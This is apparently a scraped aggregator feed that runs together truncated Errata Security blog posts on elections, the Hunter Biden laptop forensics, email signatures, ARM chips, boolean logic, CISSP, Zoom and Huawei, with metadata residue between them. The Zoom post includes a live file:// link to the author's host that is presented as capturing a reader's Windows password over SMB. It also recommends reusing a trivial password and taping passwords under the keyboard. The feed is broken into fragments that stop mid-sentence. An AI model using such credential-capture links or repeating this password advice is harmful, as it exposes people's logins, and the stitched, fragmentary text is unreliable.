The reason you haven't heard of it, the reason it isn't discussed much, is that it's so unthinkable that a politician would reject it the way Trump has. The historic importance of this principle can be seen when you go back and read the concession speeches of Hillary, McCain, Gore, Bush Sr., and Carter: all of them stressed the legitimacy of their opponent's win, and a commitment to a peaceful transfer of power. (It goes back further than that, to the founding of our country, but I can't link every speech). The following quote from Hillary's concession to Trump demonstrates this principle: But I still believe in America and I always will. And if you do, then we must accept this result and then look to the future. Donald Trump is going to be our president. We owe him an open mind and the chance to lead. Our constitutional democracy enshrines the peaceful transfer of power and we don't just respect that, we cherish it. It also enshrines other things; the rule of law, the principle that we are all equal in rights and dignity, freedom of worship and expression. We respect and cherish these values too and we must defend them. If this were Trump's only failure, then we could excuse it and work around it. As long as he defended all ]]> 2020-10-25T21:05:55+00:00 https://blog.erratasec.com/2020/10/why-biden-principle-over-party.html www.secnews.physaphae.fr/article.php?IdArticle=1996112 False Guideline None None Errata Security - Errata Security No, that's not how warrantee expiration works NYPost Hunter Biden story has triggered a lot of sleuths obsessing on technical details trying to prove it's a hoax. So far, these claims are wrong. The story is certainly bad journalism aiming to misinform readers, but it has not yet been shown to be a hoax. In this post, we look at the claim that the timelines don't match up with the manufacturing dates of the drives.
Sleuths claim to prove the drives were manufactured after the events in question, based on serial numbers. What this post will show is that the theory is wrong. Manufacturers pad warranty periods. Thus, you can't assume a date of manufacture based upon the end of a warranty period. The story starts with Hunter Biden (or associates) dropping off a laptop at a repair shop because of water damage. The repair shop made a copy of the laptop's hard drive, stored on an external drive. Later, the FBI swooped in and confiscated both the laptop and that external drive. The serial numbers of both devices are listed in the subpoena published by the NYPost: You can enter these serial numbers in the support pages at Apple (FVFXC2MMHV29) and Western Digital (WX21A19ATFF3) to discover precisely what hardware this is, and when the warranty periods expire -- and presumably, when they started. In the case of that external drive, the 3-year warranty expires May 17, 2022 -- meaning the drive was manufactured on May 17, 2019 (or so they claim). This is a full month after the claimed date of April 12, 2019, when the laptop was dropped off at the repair shop. There are lots of explanations for this. One is that the drive subpoenaed by the government (on Dec 9, 2019) was a copy of the original drive. But a simpler explanation is this: warranty periods are padded by the manufacturer by several months. In other words, if the warranty ends May 17, it means the drive was probably manufactured in February. I can prove this. Coincidentally, I purchased a Western Digital drive a few days ago.
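(The sleuths' naive back-calculation, and the padding correction just described, can be sketched with simple date arithmetic. The 90-day pad is my illustrative guess, not a figure from the post.)

```python
from datetime import date, timedelta

WARRANTY_YEARS = 3

def naive_manufacture_date(warranty_end):
    """The sleuths' assumption: manufacture = warranty end minus the warranty term."""
    return warranty_end.replace(year=warranty_end.year - WARRANTY_YEARS)

warranty_end = date(2022, 5, 17)      # from Western Digital's support page
naive = naive_manufacture_date(warranty_end)
print(naive)                          # 2019-05-17, "after" the April 12 drop-off

# but if the manufacturer pads the warranty by ~3 months, the drive
# was actually built well before the laptop was dropped off
padded = naive - timedelta(days=90)
print(padded)                         # 2019-02-16
```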
If we used the same logic as above to work backward from warranty expiration, then it means the drive was manufactured 7 days in the future. Here is a screenshot from Amazon.com showing I purchased the drive Oct 12.]]> 2020-10-16T22:59:01+00:00 https://blog.erratasec.com/2020/10/no-thats-not-how-warrantee-expiration.html www.secnews.physaphae.fr/article.php?IdArticle=1981495 False None None None Errata Security - Errata Security No, font errors mean nothing in that NYPost article on Hunter Biden emails. Critics claim that these don't look like emails, and that there are errors with the fonts, thus showing they are forgeries. This is false. This is how Apple's "Mail" app prints emails to a PDF file. The font errors are due to viewing PDF files within a web browser -- you don't see them in a PDF app. In this blogpost, I prove this. I'm going to do this by creating a forged email. The point isn't to prove the email wasn't forged -- it could easily have been; the NYPost didn't do the due diligence to prove it wasn't. The point is simply that these inexplicable problems aren't evidence of forgery. All emails printed by the Mail app to a PDF, then displayed with Scribd, will look the same way. To start with, we are going to create a simple text file on the computer called "erratarob-conspire.eml". That's what email messages are at the core -- text files. I use Apple's "TextEdit" app on my MacBook to create the file. The structure of an email is simple. It has a block of "metadata" consisting of fields separated by a colon ":" character. This block ends with a blank line, after which we have the contents of the email. Clicking on the file launches Apple's "Mail" app. It opens the email and renders it on the screen like this: Notice how the "Mail" app has reformatted the metadata. In addition to displaying the email, it's making it simple to click on the names to add them to your address book.
That's why there is a (VP) to the right on the screen -- it creates a placeholder icon for every account in your address book. One thing I can do with emails is to save them as a PDF document. This creates a PDF file on the disk that we can view like any other PDF file. Note that yet again, the app has reformatted the metadata, different from both how it displayed it on the screen and how it appears in the original email text.]]> 2020-10-16T17:45:28+00:00 https://blog.erratasec.com/2020/10/no-font-errors-mean-nothing-in-that.html www.secnews.physaphae.fr/article.php?IdArticle=1981263 False None None None Errata Security - Errata Security Yes, we can validate leaked emails This controversy concerns the leak of emails of Hunter Biden. It has a definitive answer. Today's emails have "cryptographic signatures" inside the metadata. Such signatures have been common for the past decade as one way of controlling spam, to verify the sender is who they claim to be. These signatures verify not only the sender, but also that the contents have not been altered. In other words, it authenticates the document, who sent it, and when it was sent. Crypto works. The only way to bypass these signatures is to hack into the servers. In other words, when we see a 6-year-old message with a valid Gmail signature, we know either (a) it's valid or (b) they hacked into Gmail to steal the signing key. Since (b) is extremely unlikely -- and if they could hack Google, they could do far more important things with the information -- we have to assume (a). Your email client normally hides this metadata from you, because it's boring and humans rarely want to see it. But it's still there in the original email document. An email message is simply a text document consisting of metadata followed by the message contents. It takes no special skills to see metadata. If the person has enough skill to export the email to a PDF document, they have enough skill to export the email source.
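(To make the "metadata followed by contents" structure and the signature header concrete, here is a sketch using Python's standard email library. The addresses and the truncated DKIM-Signature values are made-up placeholders; real verification would additionally require fetching the signer's public key from DNS, e.g. with the third-party dkimpy package.)

```python
from email import message_from_string

# a made-up raw message: a block of "Field: value" headers, a blank
# line, then the body -- exactly what a .eml file contains
raw = """\
DKIM-Signature: v=1; a=rsa-sha256; d=gmail.com; s=20161025; bh=FAKE; b=FAKE
From: Rob <rob.example@gmail.com>
To: rob@robertgraham.com
Subject: test
Message-ID: <fake123@mail.gmail.com>

Hello.
"""

msg = message_from_string(raw)
body = msg.get_payload()

# the d= tag names the signing domain; the signature covers selected
# headers and a hash of the body, so altering either breaks verification
tags = dict(t.strip().split("=", 1)
            for t in msg["DKIM-Signature"].split(";"))
print(tags["d"], body.strip())  # gmail.com Hello.
```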
If they can upload the PDF to Scribd (as in the story), they can upload the email source. I show how to below. To show how this works, I send an email using Gmail to my private email server (from gmail.com to robertgraham.com). The NYPost story shows the email printed as a PDF document. Thus, I do the same thing when the email arrives on my MacBook, using the Apple "Mail" app. It looks like the following: The "raw" form originally sent from my Gmail account is simply a text document that looked like the following: This is rather simple. Clients insert details like a "Message-ID" that humans don't care about. There are also internal formatting details, like the fact that this is a "plain text" message rather than an "HTML" email. But this raw document was the one sent by the Gmail web client. It then passed through Gmail's servers, then was passed across the Internet to my private server, where I finally retrieved it using my MacBook. As email messages pass through servers, the servers add their own metadata. When it arrived, the "raw" document looked like the following. None of the important bits changed, but a lot more metadata was added:]]> 2020-10-14T19:34:25+00:00 https://blog.erratasec.com/2020/10/yes-we-can-validate-leaked-emails.html www.secnews.physaphae.fr/article.php?IdArticle=1977511 False Hack,Guideline None None Errata Security - Errata Security Factcheck: Regeneron's use of embryonic stem cells deliberately misinterpreted events to conclude there was still an ethical paradox.
I've read the scientific papers and it seems like this is an issue that can be understood with basic high-school science, so I thought I'd write up a detailed discussion. The short answer is this:
The drug is not manufactured in any way from human embryonic tissues.
The drug was tested using fetal/embryonic cells, but ones almost 50 years old, not new ones.
Republicans want to stop using new embryos; the ethical issue here is the continued use of old embryos, which Republicans have consistently agreed to.
Yes, the drug is still tainted by the "embryonic stem cell" issue -- just not in any of the ways that people claim it is, and not in a way that makes Republicans inconsistent.
Almost all medical advances of the last few decades are similarly tainted.
Now let's do the long, complicated answer. This starts with a discussion of the science of Regeneron's REGN-COV2 treatment. A well-known treatment that goes back decades is to take blood plasma from a recently recovered patient and give it to a recently infected patient. Blood plasma is where the blood cells are removed, leaving behind water, salts, other particles, and most importantly, "antibodies". This is the technical concept behind the movie "Outbreak", though of course they completely distort the science. Antibodies are produced by the immune system to recognize and latch onto foreign things, including viruses (the rest of this discussion assumes "viruses"). They either deactivate the virus particle, or mark it to be destroyed by other parts of the immune system, or both. After an initial infection, it takes a while for the body to produce antibodies, allowing the disease to rage unchecked. A massive injection of antibodies during this time allows the disease to be stopped before it gets very far, letting the body's own defenses catch up. That's the premise behind Trump's treatment. An alternative to harvesting natural antibodies from recently recovered patients is to manufacture artificial antibodies using modern science.
That's what Regeneron did. An antibody is just another "protein", the building blocks of the body. The protein is in the shape of a Y with the two upper tips formed to lock onto the corresponding parts of a virus ("antigens"). Every new virus requires a new antibody with different tips. The SARS-COV-2 virus has these "spike" proteins on its surface that allow it to invade the cells in our lungs. They act like a crowbar, jamming themselves into the cell wall, then opening up a hole to allow the rest of the virus inside. Since this is the important and unique prote]]> 2020-10-08T21:44:25+00:00 https://blog.erratasec.com/2020/10/factcheck-regenerons-use-of-embryonic.html www.secnews.physaphae.fr/article.php?IdArticle=1964696 False Guideline None None Errata Security - Errata Security How CEOs think July 16, 2020 The only thing more broken than how CEOs view cybersecurity is how cybersecurity experts view cybersecurity. We have this flawed view that cybersecurity is a moral imperative, that it's an aim by itself. We are convinced that people are wrong for not taking security seriously. This isn't true. Security isn't a moral issue but simple cost vs. benefits, risk vs. rewards. Taking risks is more often the correct answer rather than having more security. Rather than experts dispensing unbiased advice, we've become advocates/activists, trying to convince people that they need to do more to secure things. This activism has destroyed our credibility in the boardroom. Nobody thinks we are honest. Most of our advice is actually internal political battles. CEOs trust outside consultants mostly because outsiders don't have a stake in internal politics. Thus, the consultant can say the same thing as what you say, but be trusted. CEOs view cybersecurity the same way they view everything else about building the business, from investment in office buildings, to capital equipment, to HR policies, to marketing programs, to telephone infrastructure, to law firms, to ....
everything. They divide their business into two parts:
The first is the part they do well, the thing they are experts at, the things that define who they are as a company, their competitive advantage.
The second is everything else, the things they don't understand.
For the second part, they just want to be average in their industry, or at best, slightly above average. They want their manufacturing costs to be about average. They want the salaries paid to employees to be about average. They want the same video conferencing system as everybody else. Everything outside of core competency is average. I can't express this enough: if it's not their core competency, then they don't want to excel at it. Excelling at a thing comes with a price. They have to pay people more. They have to find the leaders with proven track records of excelling at it. They have to manage excellence. This goes all the way to the top. If it's something the company is going to excel at, then the CEO at the top has to have enough expertise themselves to understand who the best leaders are to accomplish this goal. The CEO can't hire an excellent CSO unless they have enough competency to judge the qualifications of the CSO, and enough competency to hold the CSO accountable for the job they are doing. All this is a tradeoff. A focus of attention on one part of the business means less attention on other parts of the business. If your company excels at cybersecurity, it means not excelling at some other part of the business. So unless you are a company like Google, whose cybersecurity is a competitive advantage, you don't want to excel in cybersecurity. You want to be]]> 2020-07-19T17:07:57+00:00 https://blog.erratasec.com/2020/07/how-ceos-think.html www.secnews.physaphae.fr/article.php?IdArticle=1813717 False Ransomware,Guideline NotPetya None Errata Security - Errata Security In defense of open debate Letter on Justice and Open Debate.
It's a rather boring defense of liberalism and the norm of tolerating differing points of view. Mike Masnick wrote a rebuttal on Techdirt. In this post, I'm going to rebut his rebuttal, writing a counter-counter-argument. The Letter said that the norms of liberalism tolerate disagreement, and that these norms are under attack by increasing illiberalism on both sides, both the left and the right. My point is this: Masnick avoids rebutting the letter. He's recycling his arguments against right-wingers who want their speech coddled, rather than addressing the concerns of (mostly) left-wingers worried about the fanaticism on their own side.
Free speech
Masnick mentions "free speech" 19 times in his rebuttal -- but the term does not appear in the Harper's letter, not even once. This demonstrates my thesis that his rebuttal misses the point. The term "free speech" has lost its meaning. It's no longer useful for such conversations. Left-wingers want media sites like Facebook, YouTube, the New York Times to remove "bad" speech, like right-wing "misinformation". But, as we've been taught, censoring speech is bad. Therefore, "censoring free speech" has to be redefined so as to not include the above effort. The redefinition claims that the term "free speech" now applies to governments, but not private organizations, that stopping free speech happens only when state power or the courts are involved. In other words, "free speech" is supposed to equate with the "First Amendment", which really does only apply to government ("Congress shall pass no law abridging free speech"). That this is false is demonstrated by things like the murders of Charlie Hebdo cartoonists for depicting Muhammad. We all agree this incident is a "free speech" issue, but no government was involved. Right-wingers agree to this new definition, sort of.
In much the same way that left-wingers want to narrow "free speech" to only mean the First Amendment, right-wingers want to expand the "First Amendment" to mean protecting "free speech" against interference by both government and private platforms. They argue that platforms like Facebook have become so pervasive that they have become the "public square", and thus occupy the same space as government. They therefore want regulations that coddle their speech, preventing their content from being removed. The term "free speech" is therefore no longer useful in explaining the argument because it has become the argument. The Letter avoids this play on words. It's not talking about "free speech", but the "norms of open debate and toleration of differences". It claims first of all that we have a liberal tradition where we tolerate differences of opinion and that we debate these opinions openly. It claims secondly that these norms are weakening, citing an "intolerant climate that has set in on all sides". In other words, those who attacked the NYTimes for publishing the Tom Cotton op-ed are criticized as demonstrating illiberalism and intolerance. This has nothing to do with whatever arguments you have about "free speech".
Private platforms
Masnick's free speech argument continues that you can't force speech upon private platforms like the New York Times. They have the freedom to make their own editorial decisions about what to publish, choosing some things, rejecting others. It's a good argument, but one that targets the arguments made by right-wingers hostile to the New York Times, and not arguments made by th]]> 2020-07-13T19:22:41+00:00 https://blog.erratasec.com/2020/07/in-defense-of-open-debate.html www.secnews.physaphae.fr/article.php?IdArticle=1802813 False None None None Errata Security - Errata Security Apple ARM Mac rumors It's different this time
This would be Apple's fourth transition. Their original Macintoshes in 1984 used Motorola 68000 microprocessors.
They moved to IBM's PowerPC in 1994, then to Intel's x86 in 2005.

However, this history is almost certainly the wrong way to look at the situation. In those days, Apple had little choice. Each transition happened because the processor they were using was failing to keep up with technological change. They had no choice but to move to a new processor.

This no longer applies. Intel's x86 is competitive on both speed and power efficiency. It's not going away. If Apple transitions away from x86, they'll still be competing against x86-based computers.

Other companies have chosen to adopt both x86 and ARM, rather than one or the other. Microsoft's "Surface Pro" laptops come in either x86 or ARM versions. Amazon's AWS cloud servers come in either x86 or ARM versions. Google's Chromebooks come in either x86 or ARM versions.

Instead of ARM replacing x86, Apple may be attempting to provide both as options, possibly an ARM CPU for cheaper systems and an x86 for more expensive and more powerful systems.

ARM isn't more power efficient than x86

Every news story, every single one, is going to repeat the claim that ARM chips are more power efficient than Intel's x86 chips. Some will claim it's because they are RISC whereas Intel is CISC.

This isn't true. RISC vs. CISC was a principle in the 1980s, when chips were so small that instruction set differences meant architectural differences. Since 1995, with "out-of-order" processors, the instruction set has been completely separated from the underlying architecture. At most, instruction set differences can't account for more than 5% of the difference in processor performance or efficiency.

Mobile chips consume less power by simply being slower. When you scale mobile ARM CPUs up to desktop speeds, they consume the same power as desktops. Conversely, when you scale Intel x86 processors down to mobile power consumption levels, they are just as slow.
You can test this yourself by comparing Intel's mobile-oriented "Atom" processors against the ARM processors in a Raspberry Pi.

Moreover, the CPU accounts for only a small part of overall power consumption. Mobile platforms care more about the graphics processor or video acceleration than they do the CPU. Large differences in CPU efficiency mean small differences in overall platform efficiency.

Apple certainly balances its chips so they work better in phones than an Intel x86 would, but these tradeoffs mean they'd work worse in laptops.

While overall performance and efficiency will be similar, specific applications will perform differently. Thus, when ARM Macintoshes arrive, people will choose just the right benchmarks to "prove" their inherent superiority. It won't be true, but everyone will believe it to be true.

No longer a desktop company

Venture capitalist Mary Meeker produces yearly reports on market trends. The desktop computer market has been stagnant for over a decade in the face of mobile growth. The Macintosh is only 10% of Apple's business -- so little that they could abandon the business without noticing a difference.

This means investing in the Macintosh business is a poor business decision. Such investment isn't going to produce growth. Investing in a major transition from x86 to ARM is therefore stupid -- it'll cost a lot of money without generating any return.

In particular, despite having a mobile CPU for their iPhone, they still don't have a CPU optimized for laptops and desktops. The Macintosh market is just too small to fund…

(2020-06-16, https://blog.erratasec.com/2020/06/apple-arm-mac-rumors.html)

Errata Security - What is Boolean?

Boole was a mathematician who tried to apply the concepts of math to statements of "true" and "false", rather than numbers like 1, 2, 3, 4, ...
He also did a lot of other mathematical work, but it's this work that continues to bear his name ("boolean logic" or "boolean algebra").

But what we know of today as "boolean algebra" was really developed by others. They named it after him, but really all the important stuff was developed later. Moreover, the "1" and "0" of binary computers aren't precisely the same thing as the "true" and "false" of boolean algebra, though there is considerable overlap.

Computers are built from things called "transistors" which act as tiny switches, able to turn "on" or "off". Thus, we have the same two-value system as "true" and "false", or "1" and "0".

Computers represent any number using "base two" instead of the "base ten" we are accustomed to. The "base" of number representation is the number of digits. The number of digits we use is purely arbitrary. The Babylonians had a base 60 system, computers use base 2, but the math we humans use is base 10, probably because we have 10 fingers.

We use a "positional" system. When we run out of digits, we put a '1' on the left side and start over again. Thus, "10" always equals the number of digits, the base itself. If it's base 8, then once you run out of the first eight digits 01234567, you wrap around and start again with "10", which is the value of eight in base 8.

This is in contrast to something like the non-positional Roman numerals, which had symbols for ten (X), hundred (C), and thousand (M).

A binary number is a string of 1s and 0s in base two. The number fifty-three, in binary, is 110101.

Computers can perform normal arithmetic computations on these numbers, like addition (+), subtraction (−), multiplication (×), and division (÷).

But there are also binary arithmetic operations we can do on them, like not (¬), or (∨), xor (⊕), and (∧), shift-left (≪), and shift-right (≫). That's what we refer to when we say "boolean" arithmetic.

Let's take a look at the and operation.
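These positional rules are easy to check for yourself; a quick sketch in Python, using only the standard library's base-conversion built-ins:

```python
# The number fifty-three in base two: six binary digits, 110101.
assert format(53, "b") == "110101"

# Positional wraparound: after the eight digits 0-7 in base 8,
# the written value "10" equals eight.
assert int("10", 8) == 8

# The same rule in base two: "10" is the value two.
assert int("10", 2) == 2
```

The same `int(text, base)` call handles any base from 2 to 36, which is a handy way to convince yourself that "10" always names the base.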
The and operator means if both the left "and" right numbers are 1, then the result is 1, but 0 otherwise. In other words:

  0 ∧ 0 = 0
  0 ∧ 1 = 0
  1 ∧ 0 = 0
  1 ∧ 1 = 1

There are similar "truth tables" for the other operators.

While the simplest form of such operators works on individual bits, they are more often applied to larger numbers containing many bits, many base two binary digits. For example, we might have two 8-bit numbers and apply the and operator:

    01011100
  ∧ 11001101
  = 01001100

The result is obtained by applying and to each pair of matching bits in both numbers. Both numbers have a '1' as the second bit from the left, so the final result has a '1' in that position.

Normal arithmetic computations are built from these binary operations. You can show how a sequence of and, or, and not operations can combine to add two numbers. The entire computer chip is built from sequences of these binary operations -- billions and billions of them.

(2020-05-31, https://blog.erratasec.com/2020/05/what-is-boolean.html)

Errata Security - Securing work-at-home apps

Gimmicks

First of all, I'd like to discourage you from adding security gimmicks to your product. You are no more likely to come up with an exciting new security feature on your own than you are a miracle cure for the covid. Your sales and marketing people may get excited about the feature, and they may get the customer excited about it too, but the excitement won't last.

Eventually, the customer's IT and cybersecurity teams will be brought in. They'll quickly identify your gimmick as snake oil, and you'll have made an enemy of them. They are already involved in securing the server side, the work-at-home desktop, the VPN, and all the other network essentials. You don't want them as your enemy, you want them as your friend.
You don't want to send your salesperson into the maw of a technical meeting at the customer's site trying to defend the gimmick.

You want to take the opposite approach: do something that the decision maker on the customer side won't necessarily understand, but which their IT/cybersecurity people will get excited about. You want them in the background as your champion rather than as your opposition.

Vulnerability disclosure program

To accomplish the goal described above, the thing you want is known as a vulnerability disclosure program. If there's one thing that the entire cybersecurity industry is agreed about (other than hating the term cybersecurity, preferring "infosec" instead), it's that you need this vulnerability disclosure program. Everything else you might want to do to add security features to your product comes after you have this thing.

Your product has security bugs, known as vulnerabilities. This is true of everyone, no matter how good you are. Apple, Microsoft, and Google employ the brightest minds in cybersecurity, and they have vulnerabilities. Every month you update their products with the latest fixes for these vulnerabilities. I just bought a new MacBook Air and it's already telling me I need to update the operating system to fix the bugs found after it shipped.

These bugs come mostly from outsiders. These companies have internal people searching for such bugs, as well as consultants, and do a good job quietly fixing what they find. But this goes only so far. Outsiders have a wider set of skills and perspectives than the companies could ever hope to employ themselves, so they find things that the companies miss.

These outsiders are often not customers.

This has been a chronic problem throughout the history of computers. Somebody calls up your support line and tells you there's an obvious bug that hackers can easily exploit. The customer support representative then ignores it because the caller isn't a customer.
It's foolish wasting time adding features to a product that no customer is asking for.

But then the bug leaks out to the public, hackers widely exploit it, damaging customers, and angry customers now demand to know why you did nothing to fix the bug despite having been notified about it.

The problem here is that nobody has the job of responding to such reports. The reason your company dropped the ball was that nobody was assigned to pick it up. All a vulnerability disclosure program means is that at least one person within the company has the responsibility of dealing with it.

How to set up a vulnerability disclosure program…

(2020-05-19, https://blog.erratasec.com/2020/05/securing-work-at-home-apps.html)

Errata Security - CISSP is at most equivalent to a 2-year associates degree

Recognition of equivalent qualifications and skills

The outrage over this has been "equivalent to a master's degree". I don't think this is the case. Instead, it seems "equivalent to professional awards and recognition".

The background behind this is how countries recognize "equivalent" work done in other countries. For example, a German Diplom from a university is a bit more than a U.S. bachelor's degree, but a bit less than a U.S. master's degree. How, then, do you find an equivalence between the two?

Part of this is occupational, vocational, and professional awards, certifications, and other forms of recognition. A lot of practical work experience is often equivalent to, and even better than, academic coursework.

The press release here discusses the UK's NARIC RQF framework, putting the CISSP at level 11. This makes it equivalent to post-graduate coursework and various forms of professional recognition.

I'm not sure it means it's the same as a "master's degree".
At RQF level 11, there is a fundamental difference between an "award" requiring up to 120 hours of coursework, a "certificate", and a "degree" requiring more than 370 hours of coursework. Assuming everything else checks out, this would place the CISSP at the "award" level, not the "certificate" or "degree" level.

The question here is whether the CISSP deserves recognition along with other professional certifications. Below I will argue that it doesn't.

Superficial, not technical

The CISSP isn't a technical certification. It covers all the buzzwords in the industry so you know what they refer to, but doesn't explain how anything works. You are tested on the definition of the term "firewall", but you aren't tested on any detail about how firewalls work.

This has an enormous impact on the cybersecurity industry, with hordes of "certified" professionals who are nonetheless non-technical, not knowing how things work.

This places the CISSP clearly at some lower RQF level. RQF level 11 is reserved for people with a superior understanding of how things work, whereas the CISSP is really an entry-level certification.

No college degree required

The other certifications at this level tend to require a college degree. They are a refinement of what was learned in college.

The opposite is true of the CISSP. It requires no college degree.

Now, I'm not a fan of college degrees. Idiots seem capable of getting such degrees without understanding the content, so they are not a good badge of expertise. But at least the majority of college programs take students deeper into understanding the theory of how things work rat…

(2020-05-13, https://blog.erratasec.com/2020/05/cissp-is-at-most-equivalent-to-2-year.html)

Errata Security - About them Zoom vulns...
Now is a good time to remind people to stop using the same password everywhere and to visit https://haveibeenpwned.com to view all the accounts where they've had their password stolen. Using the same password everywhere is the #1 vulnerability the average person is exposed to, and is a possible problem here. For critical accounts (Windows login, bank, email), use a different password for each. (Sure, for accounts you don't care about, use the same password everywhere; I use 'Foobar1234'.) Write these passwords down on paper and put that paper in a secure location. Don't print them, don't store them in a file on your computer. Writing it on a Post-It note taped under your keyboard is adequate security if you trust everyone in your household.

If hackers use this Zoom method to steal your Windows password, then you aren't in much danger. They can't log into your computer because it's almost certainly behind a firewall. And they can't use the password on your other accounts, because it's not the same.

Why you shouldn't worry

The reason you shouldn't worry about this password stealing problem is because it's everywhere, not just Zoom. It's also here in this browser you are using. If you click on file://hackme.robertgraham.com/foo/bar.html, then I can grab your password in exactly the same way as if you clicked on that vulnerable link in Zoom chat. That's how the Zoom bug works: hackers post these evil links in the chat window during a Zoom conference.

It's hard to say Zoom has a vulnerability when so many other applications have the same issue.

Many home ISPs block such connections to the Internet, such as Comcast, AT&T, Cox, Verizon Wireless, and others. If this is the case, when you click on the above link, nothing will happen. Your computer will try to contact hackme.robertgraham.com, and fail. You may be protected from clicking on the above link without doing anything. If your ISP doesn't block such connections, you can configure your home router to do this.
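Windows fetches such file:// links over SMB, which runs on TCP port 445, so the question is whether outbound traffic to port 445 ever leaves your network. A rough way to probe this is a quick Python sketch (the logic here is a heuristic of mine, not something from Zoom's advisory, and any hostname you test against is a placeholder):

```python
import socket

def outbound_blocked(host: str, port: int, timeout: float = 3.0) -> bool:
    """Best-effort guess: True if the connection attempt times out,
    which suggests a firewall is silently dropping the traffic."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return False   # connected: traffic is definitely not blocked
    except socket.timeout:
        return True        # silence: likely filtered somewhere on the path
    except OSError:
        return False       # refused/unreachable: the packets did get out

# Example (placeholder host): outbound_blocked("hackme.example.com", 445)
```

This is only a heuristic: a slow network can look like a block, and some ISPs actively reject rather than silently drop the traffic, which shows up here as "not blocked".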
Go into the firewall settings and block "TCP port 445 outbound". Alternatively, you can configure Windows to only follow such links internal to your home network, but not to the Internet.

If hackers (like me, if you click on the above link) get your password, then they probably can't use it. That's because while your home Internet router allows outbound connections, it (almost always) blocks inbound connections. Thus, if I steal your Windows password, I can't use it to log into your home computer unless I also break physically into your house. But if I can break into your computer physically, I can hack it without knowing your password.

The same arguments apply to corporate desktops. Corporations should block such outbound connections. They …

(2020-04-02, https://blog.erratasec.com/2020/04/about-them-zoom-vulns.html)

Errata Security - Huawei backdoors explanation, explained

…"#backdoor" seem frightening? That's because it's often used incorrectly – sometimes to deliberately create fear. Watch to learn the truth about backdoors and other types of network access. #cybersecurity pic.twitter.com/NEUXbZbcqw -- Huawei (@Huawei), March 4, 2020

This video seems in response to last month's story in the Wall Street Journal about Huawei misusing law enforcement backdoors. All telco equipment has backdoors usable only by law enforcement; the accusation is that Huawei has a backdoor into this backdoor, so that Chinese intelligence can use it.

That story was bogus. Sure, Huawei is probably guilty of providing backdoor access to the Chinese government, but something is deeply flawed with this particular story.

We know something is wrong with the story because the U.S. officials cited are anonymous. We don't know who they are or what position they have in the government.
If everything they said was true, they wouldn't insist on being anonymous, but would stand up and declare it in a press conference so that every newspaper could report it. When something is not true, or spun, they instead anonymously "leak" it to a corrupt journalist to report it their way.

This is objectively bad journalism. The Society of Professional Journalists calls this the "Washington Game". They also discuss this on their Code of Ethics page. Yes, it's really common in Washington D.C. reporting; you see it all the time, especially with the NYTimes, Wall Street Journal, and Washington Post. But it happens because what the government says is news, regardless of whether it's false or propaganda, giving government officials the ability to influence journalists. Exclusive access to corrupt journalists is how they influence stories.

We know the reporter is being especially shady because of the one quote in the story that is attributed to a named official:

"We have evidence that Huawei has the capability secretly to access sensitive and personal information in systems it maintains and sells around the world," said national security adviser Robert O'Brien.

This quote is deceptive because O'Brien doesn't say any of the things that readers assume he's saying. He doesn't actually confirm any of the allegations in the rest of the story. It doesn't say:

- That Huawei has used that capability.
- That Huawei intentionally put that capability there.
- That this is special to Huawei (rather than everywhere in the industry).

In fact, this quote applies to every telco equipment maker. They all have law enforcement backdoors. These backdoors always have "controls" to prevent them from being misused. But these controls are always flawed, either in design or in how they are used in the real world.

Moreover, all telcos have maintenance/service contracts with the equipment makers.
When there are ways around such controls, it's the company's own support engineers who will know them.

I absolutely believe Huawei that it has don…

(2020-03-06, https://blog.erratasec.com/2020/03/huawei-backdoors-explanation-explained.html)

Errata Security - A requirements spec for voting

One requirement is that the results of an election must seem legitimate. That's why responsible candidates give a "concession speech" when they lose. When John McCain lost the election to Barack Obama, he started his speech with:

"My friends, we have come to the end of a long journey. The American people have spoken, and they have spoken clearly. A little while ago, I had the honor of calling Sen. Barack Obama - to congratulate him on being elected the next president of the country that we both love."

This was important. Many of his supporters were pointing out irregularities in various states, wanting to continue the fight. But there are always irregularities, or things that look like irregularities. In every election, if a candidate really wanted to, they could drag out an election indefinitely investigating these irregularities. Responsible candidates therefore concede with such speeches, telling their supporters to stop fighting.

It's one of the problematic things in our current election system. Even before his likely loss to Hillary, Trump was already stirring up his voters to continue the fight after the election. He actually won that election, so the fight never occurred, but it was likely to occur. It's hard to imagine Trump ever conceding a fairly won election.
I hate to single out Trump here (though he deserves criticism on this issue) because it seems these days both sides are convinced that the other side is cheating.

The goal of adversaries like Putin's Russia isn't necessarily to get favored candidates elected, but to delegitimize the candidates who do get elected. As long as the opponents of the winner believe they have been cheated, Russia wins.

Is the actual requirement of election security that the elections are actually secure? Or is the requirement instead that they appear secure? After all, when two candidates each have nearly 50% of the real vote, it doesn't really matter which one has mathematical legitimacy. It matters more which has political legitimacy.

Another requirement is that the rules be fixed ahead of time. This was the big problem in the Florida recounts in the 2000 Bush election. Votes had ambiguities, like hanging chads. The legislature came up with rules for how to resolve the ambiguities, how to count the votes, after the votes had been cast. Naturally, the party in power that comes up with the rules will choose those that favor itself.

The state of Georgia recently passed a law on election systems. Computer scientists in election security criticized the law because it didn't have their favorite approach, voter-verifiable paper ballots. Instead, the ballot printed a bar code.

But the bigger problem with the law is that it left open what happens if tampering is discovered. If an audit of the paper ballots finds discrepancies, what happens then? The answer is the legislature comes up with more rules. You don't need to secretly tamper with votes; you can instead do so publicly, so that everyone knows the vote was tampered with. This then throws the problem to the state legislature to decide the victor.

Even the most perfectly secured voting system proposed by academics doesn't solve the problem. It'll detect vote tampering, but doesn't resolve what happens when tampering is detected.
What do you do with tampered votes? If you throw them out, it means one candidate wins. If you somehow fix them, it means the other candidate w…

(2020-03-04, https://blog.erratasec.com/2020/03/a-requirements-spec-for-voting.html)

Errata Security - There's no evidence the Saudis hacked Jeff Bezos's iPhone
